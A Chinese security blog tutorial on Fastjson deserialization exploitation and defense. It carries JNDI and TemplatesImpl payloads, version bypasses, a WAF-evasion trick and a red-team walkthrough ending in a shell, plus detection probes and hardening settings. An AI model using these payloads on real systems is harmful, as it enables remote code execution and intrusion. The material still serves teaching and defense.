Fastjson反序列化漏洞原理与防御实践

发布时间:2026/9/15 2:14:14

Fastjson反序列化漏洞原理与防御实践 1. Fastjson基础与漏洞背景Fastjson是阿里巴巴开源的一款高性能Java JSON处理库广泛应用于Java对象与JSON字符串之间的转换。作为国内使用最广泛的JSON库之一其反序列化漏洞堪称Java安全领域的经典案例。我第一次接触Fastjson漏洞是在2019年的一次渗透测试中。当时客户系统使用的是Fastjson 1.2.24版本通过构造特殊的JSON字符串我们成功实现了远程代码执行。这个经历让我深刻认识到JSON处理库的安全问题可能带来的严重后果。Fastjson的核心功能非常简单JSON.toJSONString()将Java对象序列化为JSON字符串JSON.parseObject()将JSON字符串反序列化为Java对象但正是这个看似简单的反序列化功能在特定条件下会成为系统安全的致命弱点。下面是一个基础示例// 序列化示例 Person person new Person(张三, 25); String json JSON.toJSONString(person); // 输出: {age:25,name:张三} // 反序列化示例 String jsonStr {\age\:30,\name\:\李四\}; Person person2 JSON.parseObject(jsonStr, Person.class);2. Fastjson反序列化漏洞原理2.1 type特性与AutoType机制Fastjson的反序列化漏洞核心源于其type特性。当JSON字符串中包含type字段时Fastjson会根据该字段值实例化对应的Java类。例如{ type: com.example.EvilClass, property: value }在反序列化时Fastjson会通过反射创建com.example.EvilClass实例调用该类的setter方法设置属性值如果该类实现了特定接口还会调用相关方法这种机制本意是为了支持多态但却为攻击者提供了可乘之机。攻击者可以构造特殊的type值指向存在危险方法的Java类。2.2 典型攻击向量分析2.2.1 JdbcRowSetImpl JNDI注入com.sun.rowset.JdbcRowSetImpl是Java标准库中的一个类其setAutoCommit()方法会触发JNDI查询。构造如下JSON即可实现攻击{ type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }当这个JSON被反序列化时创建JdbcRowSetImpl实例调用setDataSourceName()设置恶意RMI地址调用setAutoCommit(true)触发connect()connect()中执行JNDI查询加载远程恶意类2.2.2 TemplatesImpl字节码加载另一个经典攻击方式是使用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类加载恶意字节码{ type: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl, _bytecodes: [恶意类Base64编码], _outputProperties: {} }反序列化时会触发getOutputProperties()方法进而执行嵌入的恶意字节码。3. 各版本漏洞与绕过技术3.1 Fastjson ≤1.2.24这是漏洞最严重的版本AutoType默认开启且无任何防护。直接使用上述攻击向量即可利用。实战技巧使用JNDI注入时确保目标服务器能访问你的RMI/LDAP服务字节码攻击需要确保目标环境包含对应的依赖库3.2 1.2.25-1.2.41版本绕过这些版本引入了AutoType黑白名单机制但存在多种绕过方式3.2.1 L;格式绕过{ type: Lcom.sun.rowset.JdbcRowSetImpl;, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }原理Fastjson在1.2.25-1.2.41版本中对类名检查不严格Lcom.sun...;这种格式可以绕过黑名单检查。3.2.2 数组格式绕过{ type: [com.sun.rowset.JdbcRowSetImpl[{, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }3.3 1.2.42-1.2.43版本绕过这些版本修复了简单绕过但仍有方法3.3.1 双写L;绕过{ type: LLcom.sun.rowset.JdbcRowSetImpl;;, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }原理检查逻辑只去除一次L和;而类加载逻辑会递归去除。3.4 1.2.47版本缓存绕过这是最危险的绕过方式不需要开启AutoType{ a: { type: java.lang.Class, val: com.sun.rowset.JdbcRowSetImpl }, b: { type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true } }原理第一部分将恶意类加入mapping缓存第二部分直接从缓存获取类绕过检查4. 漏洞检测与防御4.1 漏洞检测方法4.1.1 DNSLog检测{ type: java.net.Inet4Address, val: your-dnslog-url }如果收到DNS查询说明存在漏洞。4.1.2 延时检测{ type: java.lang.Thread, name: {type:java.lang.Stringaaa}, sleepTime: 5000 }如果响应延迟5秒可能存在漏洞。4.2 防御措施升级到最新版本Fastjson 1.2.68已修复已知漏洞关闭AutoTypeParserConfig.getGlobalInstance().setAutoTypeSupport(false);使用SafeMode1.2.68ParserConfig.getGlobalInstance().setSafeMode(true);自定义黑白名单ParserConfig.getGlobalInstance().addAccept(com.yourpackage.); ParserConfig.getGlobalInstance().addDeny(com.sun.);5. 实战案例与经验分享在一次红队评估中我们发现目标系统使用了Fastjson 1.2.47版本。通过以下步骤成功利用使用DNSLog确认漏洞存在搭建恶意RMI服务托管Exploit类发送精心构造的JSON请求{ a: {type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl}, b: { type:com.sun.rowset.JdbcRowSetImpl, dataSourceName:rmi://our-server/Exploit, autoCommit:true } }成功获取系统shell关键经验内网环境中JNDI注入可能因网络隔离失效此时应优先考虑TemplatesImpl方式某些WAF会检测type字段可以尝试Unicode编码或注释绕过{\u0040type:com.sun.rowset.JdbcRowSetImpl}实际渗透中需要多次尝试不同payload因为环境配置可能影响利用成功率6. 学习资源与进阶方向对于想深入研究的同学建议搭建漏洞环境使用vulhub快速搭建测试环境不同Fastjson版本分别测试调试分析在IDEA中调试Fastjson源码重点关注ParserConfig.checkAutoType()方法扩展研究结合其他Java反序列化漏洞如Jackson、XStream研究JNDI注入的其他利用方式探索新型绕过WAF的技术Fastjson漏洞是理解Java反序列化安全的绝佳案例。通过这个漏洞的学习你不仅能掌握Fastjson本身的安全问题更能深入理解Java安全机制的薄弱环节。我在实际工作中发现很多开发人员至今仍在使用存在漏洞的Fastjson版本这为安全从业者提供了广阔的实践空间。
延伸阅读

更多相关文章

2026/9/15 2:12:10

凹函数与凸函数:机器学习优化收敛的几何本质

1. 项目概述:为什么凹函数和凸函数是机器学习的“隐形骨架” 你有没有遇到过训练模型时损失曲线反复震荡、优化器卡在某个平台期死活下不去,或者调参像开盲盒——换个学习率,模型要么飞速发散,要么纹丝不动?我带过十几…

2026/9/15 2:11:23

GrIMP DEM全解:基于立体摄影测量的格陵兰冰盖数字高程模型

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/15 2:11:23

安卓中间人攻击实战:mitm.zip证书信任与抓包全流程

简介:一份聚焦安卓中间人攻击(MITM)主题的打包资源,面向安卓应用开发者、移动安全测试人员以及广大对网络安全感兴趣的读者。包体约5.38MB,共100个文件,包含30个Java源码、27个XML配置、17个PNG图片、7个JA…

2026/9/15 2:11:23

W的密码题解:字符串模拟与分组轮转的通用套路

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/15 2:11:23

WordPress驱动微信小程序:壁纸应用架构与REST API实战解析

简介:Wordpress微信壁纸小程序源码是一套面向小程序开发者与个人站长的完整前后端实现,基于WordPress后台提供JSON接口数据,配合微信小程序端完成高清壁纸的浏览、分类、搜索与下载。整套资源共140个文件,以JavaScript逻辑、WXSS样…

2026/9/15 2:06:23

算力落地实践:从云平台选型到本地推理的避坑指南

邬贺铨院士那句“2030年中国算力有望占到全球30%”,乍一听是个宏观判断,但真往细里想,背后全是产业机会和落地问题。算力这个词最近几年被反复提起,从AI大模型训练到日常用的智能应用,本质上都是算力在支撑。做开发和搞…

2026/9/14 2:17:50

拯救者Y7000黑屏故障排查与维修实战指南

1. 项目概述:一台黑屏的拯救者Y7000,到底卡在哪一步? 联想拯救者Y7000系列笔记本,从2018年第一代搭载i5-8300H开始,到后来的i7-9750H、i7-10750H、i5-11400H,再到2023年款的R7-7840HS,它始终是学…

2026/9/15 0:01:16

AI英语单词APP开发:自适应学习算法与移动端优化实践

1. 项目概述 作为一名在移动应用开发领域摸爬滚打多年的老手,我最近完成了一个AI英语单词APP的开发项目。这个项目将传统单词记忆方法与现代AI技术相结合,打造了一款能够智能适应不同用户学习习惯的英语学习工具。 市面上大多数单词APP都存在一个通病&a…

2026/9/15 0:01:16

Flutter与OpenHarmony结合开发手语学习APP实战

1. 项目背景与核心价值作为一名同时接触过Flutter和OpenHarmony的开发者,最近我完成了一个基于Flutter for OpenHarmony的手语学习APP实战项目。这个项目最大的特点在于实现了跨平台框架与国产操作系统深度结合的创新实践——用Flutter开发的应用能完美运行在OpenHa…

2026/9/15 0:01:16

六个月成为机器人工程师:从ROS2到SLAM的实战路径

1. 六个月的紧迫感从哪来:先搞清楚你要成为哪种机器人工程师说实话,六个月的期限并不是一个宽松的时间线。市面上任何一本正经的机器人学教材都超过五百页,ROS2的官方文档可以翻到你怀疑人生,再加上ABB、KUKA这些工业机器人厂家动…

2026/9/14 11:59:31

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/14 13:53:59

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/14 11:22:57

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
咨询二维码